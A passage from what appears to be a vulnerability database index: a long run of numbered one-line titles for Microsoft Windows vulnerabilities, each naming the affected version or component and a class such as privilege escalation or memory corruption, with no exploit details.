escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft 